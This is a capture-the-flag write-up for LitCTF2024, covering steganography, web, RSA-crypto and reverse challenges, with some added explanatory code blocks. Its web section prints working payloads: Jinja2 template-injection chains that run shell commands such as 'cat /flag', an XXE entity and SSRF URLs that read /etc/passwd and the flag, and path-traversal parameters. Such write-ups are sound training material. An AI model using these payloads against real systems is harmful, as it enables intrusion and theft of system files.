科技颠覆者 posted on 2024-6-2 18:00:18

LitCTF2024 - ZongRan Team WriteUp

ZongRan Team WriteUp

Web + Misc: Muneyoshi
Crypto: chacha
Reverse: laonazaixiuxing
Misc

涐贪恋和伱、甾―⑺dé毎兮毎秒

Approach: LSB steganography; just extract it.
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185738633-866854850.png
LitCTF{e8f7b267-9c45-4c0e-9d1e-13fc5bcb9bd6}

你说得对,但__

Scan the QR code
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185738092-1242953200.png
Something is off: it is the Genshin Impact web page.
Extract with binwalk
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185737074-359656084.png
Then there are four QR-code images, and 知心 gave the order
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185736289-1992072463.png
Then stitch them together and scan
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185735773-1278310724.png
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185735212-1328772414.png
盯帧珍珠

The title mentions frames, so it should be a gif; look at it in 010 Editor
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185734694-620324971.png
We find a gif file header, so change the extension
Split it into frames with 随波逐流
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185734149-240094653.png
Got the flag
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185733445-1562177908.png
LitCTF{You_are_really_staring_at_frames!}

原铁,启动!

https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185730789-342502933.png
Part one: Genshin Impact
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185730118-996283031.png
Part two: Star Rail
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185728267-24267893.png
flag{good_gamer}

关键,太关键了!

A character frequency count gives
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185727490-1181220109.png
Bingo. Then decrypt it as a keyword cipher with the online tool "CTF在线工具 - Keyword Cipher" (hiencode.com)
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185727064-2087093137.png
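The writeup solved this with a frequency count followed by an online keyword-cipher tool. As an added example (not part of the original post), here is the same two-step procedure in plain Python: a letter-frequency ranking of the ciphertext, and a keyword cipher encrypt/decrypt pair. The keyword "SECRET" and the sample text are constructed for illustration; the challenge's real keyword is not reproduced on the page.

```python
from collections import Counter
import string

UPPER = string.ascii_uppercase


def keyword_alphabet(keyword):
    """Keyed alphabet: the keyword's letters (duplicates dropped) followed by the rest of A..Z."""
    out = []
    for ch in keyword.upper() + UPPER:
        if ch in UPPER and ch not in out:
            out.append(ch)
    return "".join(out)


def _tables(keyword):
    keyed = keyword_alphabet(keyword)
    # plaintext letter at position i becomes keyed[i]; lowercase handled the same way
    enc = str.maketrans(UPPER + UPPER.lower(), keyed + keyed.lower())
    dec = str.maketrans(keyed + keyed.lower(), UPPER + UPPER.lower())
    return enc, dec


def keyword_encrypt(plaintext, keyword):
    return plaintext.translate(_tables(keyword)[0])


def keyword_decrypt(ciphertext, keyword):
    return ciphertext.translate(_tables(keyword)[1])


def letter_frequency(text):
    """Letters of `text`, most common first: the step the writeup calls 字频统计.
    English plaintext usually has E, T, A, O on top; lining the top cipher letters up
    against them gives the first guesses for the keyed alphabet (and so the keyword)."""
    counts = Counter(ch for ch in text.upper() if ch in UPPER)
    return [ch for ch, _ in counts.most_common()]


if __name__ == "__main__":
    ct = keyword_encrypt("ATTACK AT DAWN", "SECRET")   # constructed sample
    print(ct, letter_frequency(ct)[:3], keyword_decrypt(ct, "SECRET"))
```

With a real ciphertext the frequency list replaces the guessing: the keyed alphabet is a substitution table, so once a few high-frequency letters are matched, the remaining positions are constrained to alphabetical order after the keyword.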
Everywhere We Go

Look at the spectrogram in Audacity (I had looked at it once in the morning, but without zooming in I didn't find it, cried)
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185726430-2063458373.png
flag{Calculate_Step_By_Step}

舔到最后应有尽有

It is clearly base64, every segment is, so it cannot be decoded as one piece; it is actually base64 steganography.
Found a script online: [MISC]Base64隐写-CSDN博客
# base64 steganography
import base64


def get_diff(s1, s2):
    # s1: the line as found in the file; s2: the canonical re-encoding of the same bytes.
    # They differ only in the last data character, and the difference is the hidden bits.
    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    res = 0
    for i in range(len(s2)):
        if s1[i] != s2[i]:
            return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
    return res


def b64_stego_decode():
    file = open("LOVE_LETTER.txt", "rb")
    x = ''  # x is the bit string
    lines = file.readlines()
    file.close()
    for line in lines:
        l = str(line, encoding="utf-8")
        stego = l.replace('\n', '')
        # print(stego)
        realtext = base64.b64decode(l)
        # print(realtext)
        realtext = str(base64.b64encode(realtext), encoding="utf-8")
        # print(realtext)
        diff = get_diff(stego, realtext)  # diff: numeric difference between the stego line and the real one
        n = stego.count('=')  # every '=' leaves 2 unused bits in the last data character
        if diff:
            x += bin(diff)[2:].zfill(n * 2)
        else:
            x += '0' * n * 2

    i = 0
    flag = ''
    while i < len(x):
        if int(x[i:i + 8], 2):
            flag += chr(int(x[i:i + 8], 2))
        i += 8
    print(flag)


if __name__ == '__main__':
    b64_stego_decode()
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185724308-961832025.png
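The script above only extracts. To show where the bits actually live, here is an added example (my code, not the post's or the CSDN script) that hides a secret in a constructed carrier and recovers it again: a line ending in one "=" has 2 unused bits in its last data character, a line ending in "==" has 4, and canonical base64 leaves them zero, so a decoder ignores whatever is put there and the carrier still decodes to the original text. The carrier lines and the secret are constructed for the demo.

```python
import base64

B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# Constructed carrier: short lines, so most of them need '=' padding.
SAMPLE_LINES = [b"Dear", b"you", b"are", b"my", b"sunshine", b"a", b"bb",
                b"ccc", b"dddd", b"e", b"ff", b"g", b"hh"]


def spare_bits(encoded):
    """Unused bits in the last data character: 2 per '=' (so 0, 2 or 4)."""
    return 2 * encoded.count("=")


def hide(plain_lines, secret):
    """Base64-encode every line, then OR bits of `secret` into the low bits of the
    last data character of each padded line. Those bits are 0 in canonical output."""
    bits = "".join(f"{b:08b}" for b in secret)
    out, pos = [], 0
    for line in plain_lines:
        enc = base64.b64encode(line).decode()
        k = spare_bits(enc)
        if k and pos < len(bits):
            chunk = bits[pos:pos + k].ljust(k, "0")
            pos += k
            last = len(enc) - enc.count("=") - 1          # last data character
            val = B64.index(enc[last]) | int(chunk, 2)
            enc = enc[:last] + B64[val] + enc[last + 1:]
        out.append(enc)
    if pos < len(bits):
        raise ValueError("carrier has too little padding for the secret")
    return out


def reveal(stego_lines):
    """Inverse of hide(): re-encode the decoded bytes canonically; the XOR of the
    differing character indices is exactly the hidden chunk for that line."""
    bits = ""
    for line in stego_lines:
        line = line.strip()
        k = spare_bits(line)
        if not k:
            continue
        canon = base64.b64encode(base64.b64decode(line)).decode()
        last = len(line) - line.count("=") - 1
        diff = B64.index(line[last]) ^ B64.index(canon[last])
        bits += f"{diff:0{k}b}"
    data = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits) - 7, 8))
    return data.rstrip(b"\x00")


def carrier_intact(stego_lines, plain_lines):
    """True if every stego line still decodes to its original plaintext."""
    return [base64.b64decode(s) for s in stego_lines] == list(plain_lines)


if __name__ == "__main__":
    stego = hide(SAMPLE_LINES, b"Hi")
    print(stego[0], reveal(stego), carrier_intact(stego, SAMPLE_LINES))
```

The capacity check is the practical caveat: only padded lines carry data, so a carrier of lines whose lengths are all multiples of three hides nothing, which is also why a file of many short base64 lines is the tell-tale sign of this technique.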
The love (added afterwards)

Opening the image in 010 Editor, we found a zip archive and something that looked like a password
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185723721-1239623694.png
Carve the image with binwalk to extract the archive, then run an ARCHPR mask attack against it
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185722801-1835862992.png
Unzip it to get a password text file and a fake flag text file
Then base64-decode the contents of password twice to get a password
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185722072-37124141.png
We also have an audio file; since it is a wav, try DeepSound steganography
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185721653-1552946944.png
Found the real flag
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185721070-1547378129.png
女装照流量 (added afterwards)

Following the streams in the capture, tcp stream 28 contains something that looks like a zip archive
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185720583-1142764206.png
We extracted an encrypted zip archive with binwalk
So the job is to find the password
In tcp stream 26 we found
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185719784-307478156.png
Then URL-decode this litcft parameter to see what it did (it is the parameter of the one-line webshell uploaded earlier)
Note that here the value is taken starting from the third character, so our base64 decoding should also start from the third character
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185718551-1439094202.png
Decoding it gives this, which reveals the archive's password
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185717767-332759358.png
Unzip it
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185717417-821500171.png
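The decoding step above (URL-decode the POST body, skip the first two characters of the parameter, then base64-decode) is what the webshell does server-side, and it is easy to get wrong by hand because URL decoding turns a literal "+" into a space, which is a valid base64 character. As an added example, not taken from the post or from the challenge's capture, here is that decode as a function, with a constructed POST body in the same shape; the parameter name `litcft` is the one named in the writeup, the junk prefix and command are made up.

```python
import base64
from urllib.parse import parse_qs

# Constructed POST body in the shape seen in the capture: two junk characters,
# then base64, URL-encoded ('=' became %3D on the wire).
SAMPLE_BODY = "litcft=xybHMgLw%3D%3D&other=1"


def decode_shell_param(body, name, skip=2):
    """URL-decode the body, take parameter `name`, drop its first `skip` characters
    (the shell does substr(..., 2) before base64_decode) and base64-decode the rest."""
    params = parse_qs(body, keep_blank_values=True)
    if name not in params:
        raise KeyError(f"parameter {name!r} not in body")
    raw = params[name][0]
    # parse_qs already turned %xx into characters, but it also turned '+' into ' '.
    # A '+' that was sent unencoded is a base64 digit, so put it back.
    raw = raw.replace(" ", "+")
    return base64.b64decode(raw[skip:])


def decode_all_params(body, skip=2):
    """Try every parameter and return {name: payload} for those that decode to something."""
    out = {}
    for name in parse_qs(body, keep_blank_values=True):
        try:
            decoded = decode_shell_param(body, name, skip)
        except (ValueError, KeyError):      # binascii.Error is a ValueError
            continue
        if decoded:
            out[name] = decoded
    return out


if __name__ == "__main__":
    print(decode_shell_param(SAMPLE_BODY, "litcft"))
    print(decode_all_params(SAMPLE_BODY))
```

For a real capture, feed each POST body from the webshell stream through `decode_all_params` and grep the results for the command that created or packed the archive; the password is usually typed in one of those commands.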
Web

SAS - Serializing Authentication System

A deserialization challenge; we build the object
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185716973-616676938.png
Then base64-encode it
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185716467-1247391067.png
Then paste it in and that's it
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185715942-589047992.png
一个....池子?

Whatever you enter is echoed back, so this is SSTI at first glance. Enter
{{7*7}}
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185715563-675415127.png
Then enter
{{7*'7'}}
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185715076-746314324.png
That confirms Jinja2.
{{''.__class__.__mro__[1].__subclasses__()}}
Dump the subclass list and use a script to find where the os module is, i.e. os._wrap_close (I copied the browser output into a text file for this). Below, i stands for the index of os._wrap_close in that list; it depends on the target's Python build, so it has to be read from the target's own dump.
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185714581-936259498.png
Now find the globals
{{''.__class__.__mro__[1].__subclasses__()[i].__init__.__globals__['__builtins__']}}
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185713840-289422893.png
Now find __import__ and use it to execute commands
{{''.__class__.__mro__[1].__subclasses__()[i].__init__.__globals__['__builtins__']['__import__']('os').popen('ls /').read()}}
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185711958-16842380.png
Read the flag
{{''.__class__.__mro__[1].__subclasses__()[i].__init__.__globals__['__builtins__']['__import__']('os').popen('cat /flag').read()}}
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185711270-1314264161.png
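The "script to find where os._wrap_close is" mentioned above is not shown in the post. As an added example (my code, not the team's), here is that lookup plus a local walk of the same attribute chain, so you can see why the payload reaches `os.popen` without involving Jinja2 at all: `_wrap_close` is a plain class defined in `os.py`, its `__init__` is a Python function, and a function's `__globals__` is the defining module's namespace, which carries `__builtins__`. The index found here is only valid for this interpreter; against a target you run `find_subclass_index` over the list the server echoed back.

```python
def subclass_list():
    """The list that {{''.__class__.__mro__[1].__subclasses__()}} dumps.
    In Python 3, ''.__class__.__mro__ is (str, object), so [1] is object."""
    return ''.__class__.__mro__[1].__subclasses__()


def find_subclass_index(name, classes=None):
    """Index of the class called `name`, or -1. Pass the names parsed from the target's
    dump as `classes` to resolve the index for the target instead of this interpreter."""
    names = classes if classes is not None else [c.__name__ for c in subclass_list()]
    for i, n in enumerate(names):
        if n == name:
            return i
    return -1


def build_payload(index, cmd):
    """The command-execution payload from the writeup with the index filled in."""
    return ("{{''.__class__.__mro__[1].__subclasses__()[%d].__init__.__globals__"
            "['__builtins__']['__import__']('os').popen('%s').read()}}" % (index, cmd))


def resolve_chain(index):
    """Walk the same chain the payload uses and return the callable it ends at."""
    cls = subclass_list()[index]
    g = cls.__init__.__globals__                   # globals of the module defining cls (os)
    b = g['__builtins__']                          # a dict in imported modules, a module in __main__
    importer = b['__import__'] if isinstance(b, dict) else b.__import__
    return importer('os').popen


if __name__ == "__main__":
    idx = find_subclass_index("_wrap_close")
    print(idx, resolve_chain(idx), build_payload(idx, "id"))
```

When you only have the server's echoed list, split it on `, ` and strip the `<class '...'>` wrappers to get the names, then pass them as `classes`; the defensive takeaway is that any class in that list whose module imports `os` (or exposes `__builtins__`) is an equivalent gadget, so the fix is rendering user input as data (`render(name=user_input)`) or a sandboxed environment, not blocking `_wrap_close` by name.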
exx

This one is also familiar; I happened to do it a few days ago in Fake XML cookbook,
and the challenge title itself says xxe
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185710634-1789152926.png
Then the XXE injection:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hack [
<!ENTITY xxe SYSTEM "file:///flag">]>
<user><username>&xxe;</username><password>123</password></user>
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185709979-501332398.png
浏览器也能套娃?

First tried a Baidu URL and it could be fetched, so this should be SSRF
Then use the file protocol:
file:///etc/passwd did come back
Then read the flag directly:
file:///flag
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185709517-797326145.png
高亮主题(划掉)背景查看器

At first I thought file inclusion, but it is actually directory traversal; the page also hints that you should click to pick a theme
Captured the request:
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185709073-1000250049.png
Then I tried
theme=../flag.php and the path was echoed back
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185708570-296558826.png
So it should be directory traversal. First find the root directory, which is just trial and error, ending up with
theme=../../../../etc/passwd
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185708073-1061247088.png
Then read the flag
theme=../../../../flag
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185707334-505508235.png
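The bug behind this challenge is a path joined straight from the `theme` parameter. As an added example (not the challenge's code, whose language and file layout are not shown), here is the vulnerable join next to a hardened resolver and a self-contained demo: it builds a temporary `themes/dark` with a `flag` file one level up, shows `../flag` leaking through the naive join, and shows the hardened version rejecting `../flag`, a deep `../../../../etc/passwd` and an absolute path while still serving `dark`. All paths and file contents are constructed.

```python
import os
import tempfile


def vulnerable_theme_path(theme_dir, theme):
    """What the challenge does: the request value is joined onto the directory as-is,
    so '../flag' walks out, and an absolute path makes join() drop theme_dir entirely."""
    return os.path.join(theme_dir, theme)


def safe_theme_path(theme_dir, theme):
    """Resolve the requested file and refuse anything outside theme_dir.
    realpath() collapses '..' and symlinks *before* the containment check."""
    base = os.path.realpath(theme_dir)
    candidate = os.path.realpath(os.path.join(base, theme))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:                      # different drives on Windows
        inside = False
    if not inside or not os.path.isfile(candidate):
        raise ValueError(f"rejected theme {theme!r}")
    return candidate


def demo():
    """Throwaway tree: themes/dark plus a sibling file the theme picker must not expose."""
    with tempfile.TemporaryDirectory() as root:
        themes = os.path.join(root, "themes")
        os.mkdir(themes)
        with open(os.path.join(themes, "dark"), "w") as f:
            f.write("body{background:#000}")
        with open(os.path.join(root, "flag"), "w") as f:
            f.write("flag{constructed}")
        with open(vulnerable_theme_path(themes, "../flag")) as f:
            leaked = f.read()
        blocked = []
        for attempt in ("../flag", "../../../../etc/passwd", os.path.join(root, "flag")):
            try:
                safe_theme_path(themes, attempt)
                blocked.append(False)
            except ValueError:
                blocked.append(True)
        with open(safe_theme_path(themes, "dark")) as f:
            allowed = f.read()
        return leaked, all(blocked), allowed


if __name__ == "__main__":
    print(demo())
```

A string check such as `".." not in theme` is not a substitute: it does nothing for absolute paths, URL-encoded dots or a symlink inside the theme directory, which is why the check is done on the resolved path.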
Crypto

common_primes

Shared prime

We are given one e and several (n, c) pairs, all encryptions of the same plaintext m. Running gcd() on two different n gives their greatest common divisor, which is the shared prime p.
With p we get q, then d, and decrypt m.
from Crypto.Util.number import *
import gmpy2

n1 = 63306931765261881888912008095340470978772999620205174857271016152744820165330787864800482852578992473814976781143226630412780924144266471891939661312715157811674817013479316983665960087664430205713509995750877665395721635625035356901765881750073584848176491668327836527294900831898083545883834181689919776769
n2 = 73890412251808619164803968217212494551414786402702497903464017254263780569629065810640215252722102084753519255771619560056118922616964068426636691565703046691711267156442562144139650728482437040380743352597966331370286795249123105338283013032779352474246753386108510685224781299865560425114568893879804036573
c1 = 11273036722994861938281568979042367628277071611591846129102291159440871997302324919023708593105900105417528793646809809850626919594099479505740175853342947734943586940152981298688146019253712344529086852083823837309492466840942593843720630113494974454498664328412122979195932862028821524725158358036734514252
c2 = 42478690444030101869094906005321968598060849172551382502632480617775125215522908666432583017311390935937075283150967678500354031213909256982757457592610576392121713817693171520657833496635639026791597219755461854281419207606460025156812307819350960182028395013278964809309982264879773316952047848608898562420

p = gmpy2.gcd(n1, n2)
if p == 1:
    exit("n1和n2没有不为1的最大公因子")
q1 = n1 // p
q2 = n2 // p

phi_n1 = (p - 1) * (q1 - 1)
phi_n2 = (p - 1) * (q2 - 1)
e = 65537
d1 = gmpy2.invert(e, phi_n1)
m1 = pow(c1, d1, n1)
print(long_to_bytes(m1))
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185706812-1576707124.png
small_e

Small plaintext attack

Applies when e is small, usually 3. If the public exponent e is small and the plaintext m is not large, then in m^e = k*n + c the value k is small. Enumerate k from 0, take the e-th root of each k*n + c, and stop at the first one that is an exact integer; that integer is the plaintext.
Approach (here each c in c_list is a single character cubed, so m^3 < n, k = 0, and the root can be taken directly):

[*] Iterate over each element c of c_list.
[*] For each c, compute its cube root (c ** (1/3)).
[*] Use round() to round the cube root to the nearest integer.
[*] Use chr() to turn the rounded integer into the corresponding ASCII character.
[*] Apply the above to every element of c_list with a list comprehension, giving a list of characters.
[*] Join the characters into one string with ''.join().
[*] Assign the resulting string to flag.
from Crypto.Util.number import *

'''
n = 19041138093915757361446596917618836424321232810490087445558083446664894622882726613154205435993358657711781275735559409274819618824173042980556986038895407758062549819608054613307399838408867855623647751322414190174111523595370113664729594420259754806834656490417292174994337683676504327493103018506242963063671315605427867054873507720342850038307517016687659435974562024973531717274759193577450556292821410388268243304996720337394829726453680432751092955575512372582624694709289019402908986429709116441544332327738968785428501665254894444651547623008530708343210644814773933974042816703834571427534684321229977525229
c_list = [...]   # the ciphertext list from the challenge (not reproduced here)
'''

e = 3
c_list = []  # paste the challenge's ciphertext list here
# Decrypt: every c is one character's code point cubed, so the float cube root is exact
# after rounding (for large values use an integer root, e.g. gmpy2.iroot, instead)
flag = ''.join([chr(round(c ** (1 / 3))) for c in c_list])
print(flag)
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185706239-607113727.png
CRT

Classic Chinese Remainder Theorem

Let M = m1·m2·…·mn be the product of the integers m1, m2, ..., mn, and let Mi = M / mi, i.e. Mi is the product of the n − 1 integers other than mi.
Let ti be the modular inverse of Mi modulo mi: ti·Mi ≡ 1 (mod mi).
The general solution of the system x ≡ ai (mod mi) has the form x = a1·t1·M1 + a2·t2·M2 + … + an·tn·Mn + k·M (k an integer); modulo M the system has exactly one solution: x ≡ Σ ai·ti·Mi (mod M).
from gmpy2 import *
from Crypto.Util.number import *

n_list = []  # the moduli from the challenge (not reproduced here)
c_list = []  # the matching ciphertexts


def crt(n_list, c_list):
    n = 1
    for i in n_list:
        n *= i
    N = []  # Mi
    for i in n_list:
        N.append(n // i)  # append to the end of the list
    t = []  # ti
    for i in range(len(n_list)):
        t.append(invert(N[i], n_list[i]))  # modular inverse

    res = 0
    for i in range(len(n_list)):
        res = (res + c_list[i] * t[i] * N[i]) % n
    # c_list plays the role of a in the general solution
    return res


e = 10
M = crt(n_list, c_list)
m, exact = iroot(M, e)  # gmpy2.iroot returns (root, is_exact); with enough moduli the root is exact
flag = long_to_bytes(m)
print(flag)
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185705842-337754878.png
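The small_e section above describes enumerating k in m^e = k·n + c, which its script never needed (k = 0), and the CRT section needs an exact integer e-th root of the CRT value; both come down to the same integer-root routine. As one added example serving both sections (my code, not the team's scripts, and stdlib only, so no gmpy2), here is an integer n-th root by Newton iteration, the k-enumeration attack, and Håstad's broadcast via CRT. The moduli are constructed from Mersenne primes so they are certainly pairwise coprime; the messages are made up, and e = 3 with three recipients is used rather than the challenge's e = 10, the procedure being identical.

```python
# Constructed parameters: products of distinct Mersenne primes, so pairwise coprime.
P31, P61, P89, P107 = 2**31 - 1, 2**61 - 1, 2**89 - 1, 2**107 - 1
P13, P17 = 2**13 - 1, 2**17 - 1
N_LIST = [P31 * P61, P89 * P17, P107 * P13]
E = 3


def iroot(x, n):
    """Integer n-th root by Newton iteration: (r, exact) with r = floor(x ** (1/n))."""
    if x < 0 or n < 1:
        raise ValueError("x must be >= 0 and n >= 1")
    if x < 2:
        return x, True
    r = 1 << ((x.bit_length() + n - 1) // n)      # overestimate, so the iteration descends
    while True:
        y = ((n - 1) * r + x // r ** (n - 1)) // n
        if y >= r:
            break
        r = y
    return r, r ** n == x


def small_e_attack(c, n, e, max_k=1 << 20):
    """m**e = k*n + c with small k: try k = 0, 1, 2, ... until k*n + c is an exact e-th power."""
    for k in range(max_k):
        m, exact = iroot(k * n + c, e)
        if exact:
            return m, k
    return None


def crt(residues, moduli):
    """x ≡ a_i (mod m_i), m_i pairwise coprime: x = Σ a_i·t_i·M_i mod M with t_i = M_i^-1 mod m_i."""
    M = 1
    for m in moduli:
        M *= m
    x = 0
    for a, m in zip(residues, moduli):
        Mi = M // m
        ti = pow(Mi, -1, m)                      # modular inverse (Python 3.8+)
        x = (x + a * ti * Mi) % M
    return x, M


def hastad_broadcast(c_list, n_list, e):
    """Same m sent to e recipients with exponent e: CRT yields m**e itself, since m**e < ΠN."""
    if len(c_list) < e:
        raise ValueError("need at least e ciphertexts")
    m_pow_e, _ = crt(c_list[:e], n_list[:e])
    m, exact = iroot(m_pow_e, e)
    return m if exact else None


def demo():
    # 1) one modulus, m**3 slightly larger than n, so k > 0 is needed
    m1 = 2**32 + 12345
    rec1, k = small_e_attack(pow(m1, E, N_LIST[0]), N_LIST[0], E)
    # 2) broadcast: one short message to three recipients
    m2 = int.from_bytes(b"hastad", "big")
    c_list = [pow(m2, E, n) for n in N_LIST]
    rec2 = hastad_broadcast(c_list, N_LIST, E)
    return rec1 == m1, k, rec2.to_bytes(6, "big")


if __name__ == "__main__":
    print(demo())
```

Two things the scripts on the page leave implicit: the k-enumeration only terminates quickly if m^e is not much larger than n (k is bounded by m^e / n), and the broadcast attack needs at least e moduli, because only then is m^e guaranteed to be below the CRT modulus and the root exact.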
Polynomial

Solve the equations + multi-prime

Solve the system for p, q, r
φ(n) = φ(p)φ(q)φ(r) = (p−1)(q−1)(r−1)
from Crypto.Util.number import *
import sympy as sp
import gmpy2


p,q,r=sp.symbols('p q r')

Polynomial1 = 58154360680755769340954893572401748667033313354117942223258370092578635555451803701875246040822675770820625484823955325325376503299610647282074512182673844099014723538935840345806279326671621834884174315042653272845859393720044076731894387316020043030549656441366838837625687203481896972821231596403741150142
Polynomial2 = 171692903673150731426296312524549271861303258108708311216496913475394189393793697817800098242049692305164782587880637516028827647505093628717337292578359337044168928317124830023051015272429945829345733688929892412065424786481363731277240073380880692592385413767327833405744609781605297684139130460468105300760
Polynomial3 = 97986346322515909710602796387982657630408165005623501811821116195049269186902123564611531712164389221482586560334051304898550068155631792198375385506099765648724724155022839470830188199666501947166597094066238209936082936786792764398576045555400742489416583987159603174056183635543796238419852007348207068832
c = 690029769225186609779381701643778761457138553080920444396078012690121613426213828722870549564971078807093600149349998980667982840018011505754141625901220546541212773327617562979660059608220851878701195162259632365509731746682263484332327620436394912873346114451271145412882158989824703847237437871480757404551113620810392782422053869083938928788602100916785471462523020232714027448069442708638323048761035121752395570167604059421559260760645061567883338223699900

eq1= p**2 + q-Polynomial1
eq2= q**2 + r-Polynomial2
eq3= r**2 + p-Polynomial3

sol = sp.solve((eq1 , eq2,eq3), (p, q, r))
# print(sol)

p=7625900647186256736313352208336189136024613525845451962194744676052072325262646533642163553090015734584960267587813894745414843037111074258730819958397631
q=13103163880267648221851617296336865295731278851373488569182099549824826973560296247802058712197255433671825570972129891122274435889696663320490806634737981
r=9898805297737495640281149403465681435952383402115255751446422784763742395898034378399391604085137196351802539935697155137226495010184322468562791581344399
e = 65537
n = p * q * r
d = gmpy2.invert(e, (p - 1) * (q - 1) * (r-1))
m = pow(c, d, n)
print(long_to_bytes(m))
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185705472-1091930814.png
真·EasyRSA

Euler's totient

n = p^4
φ(n) = p^4 − p^3
from Crypto.Util.number import *
import gmpy2
'''
p=getPrime(256)
print(p)
n=p**4
m=bytes_to_long(flag)
e=65537
c=pow(m,e,n)
print(c)
'''

c1= 78995097464505692833175221336110444691706720784642201874318792576886638370795877665241433503242322048462220941850261103929220636367258375223629313880314757819288233877871049903331061261182932603536690216472460424869498053787147893179733302705430645181983825884645791816106080546937178721898460776392249707560
c2= 3784701757181065428915597927276042180461070890549646164035543821266506371502690247347168340234933318004928718562990468281285421981157783991138077081303219
n = 111880903302112599361822243412777826052651261464069603671228695119729911614927471127031113870129416452329155262786735889603893196627646342615137280714187446627292465966881136599942375394018828846001863354234047074224843640145067337664994314496776439054625605421747689126816804916163793264559188427704647589521
c=93492332457019255141294502555555489582661562346262162342211605562996217352449
n1=93492332457019255141294502555555489582661562346262162342211605562996217352449
p, exact = gmpy2.iroot(n, 4)  # gmpy2.iroot returns (root, is_exact)
assert exact, "n is not a perfect fourth power"
print(p)
e = 65537
phi = p**4 - p**3

d = gmpy2.invert(e, phi)
m1 = pow(c1, d, n)

print(long_to_bytes(m1))
Running this gives a hint
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185705030-717792312.png
Comparing the number of digits of p and of the hint, they differ by only one, so we guessed the hint is p and did ordinary RSA with c2, n, e, p and q
from Crypto.Util.number import *
import gmpy2

c2= 3784701757181065428915597927276042180461070890549646164035543821266506371502690247347168340234933318004928718562990468281285421981157783991138077081303219
c=93492332457019255141294502555555489582661562346262162342211605562996217352449
n1=93492332457019255141294502555555489582661562346262162342211605562996217352449
p = 102846375519753428570573823986925744957687092615041080268232889119455234034483
q = 93492332457019255141294502555555489582661562346262162342211605562996217352449
e = 65537
phi = (p-1)*(q-1)
n= q * p
d = gmpy2.invert(e,phi)
m1 = pow(c2,d,n)

print(long_to_bytes(m1))
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185704564-1346161252.png
little_fermat

Fermat factorization

p and q are two primes that are adjacent in the sequence of primes. So the square root of their product must be a number between p and q (and it is certainly not prime, because p and q are neighbouring primes).
So the next prime after that square root must be q, and n / q gives the other prime.
from Crypto.Util.number import *
from sympy import *
from gmpy2 import *
'''
m = bytes_to_long(flag)
e = 65537
p = getPrime(512)
q = nextprime(p)
n = p * q

x = gen_x(p)

assert pow(666666, x, p) == 1

m = m ^ x
c = pow(m, e, n)

print(f'n = {n}')
print(f'c = {c}')
'''
e = 65537
n = 122719648746679660211272134136414102389555796575857405114496972248651220892565781331814993584484991300852578490929023084395318478514528533234617759712503439058334479192297581245539902950267201362675602085964421659147977335779128546965068649265419736053467523009673037723382969371523663674759921589944204926693
c = 109215817118156917306151535199288935588358410885541150319309172366532983941498151858496142368333375769194040807735053625645757204569614999883828047720427480384683375435683833780686557341909400842874816853528007258975117265789241663068590445878241153205106444357554372566670436865722966668420239234530554168928
sn=isqrt(n)
q=next_prime(sn)
p=n//q
phi=(p-1)*(q-1)
d=invert(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m^p))

Reverse

编码喵

Open it in IDA
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185704123-1600785742.jpg
The input string is encoded by LitCTF_tanji_calculate::Encode((__int64)v16, v21, v12, v11); and then compared with "tgL0q1rgEZaZmdm0zwq4lweYzgeTngfHnI1ImMm5ltaXywnLowuYnJmWmx0=".
Stepping into LitCTF_tanji_calculate::Encode((__int64)v16, v21, v12, v11); it looks like base64 encoding; check what a2, the encoding alphabet, is
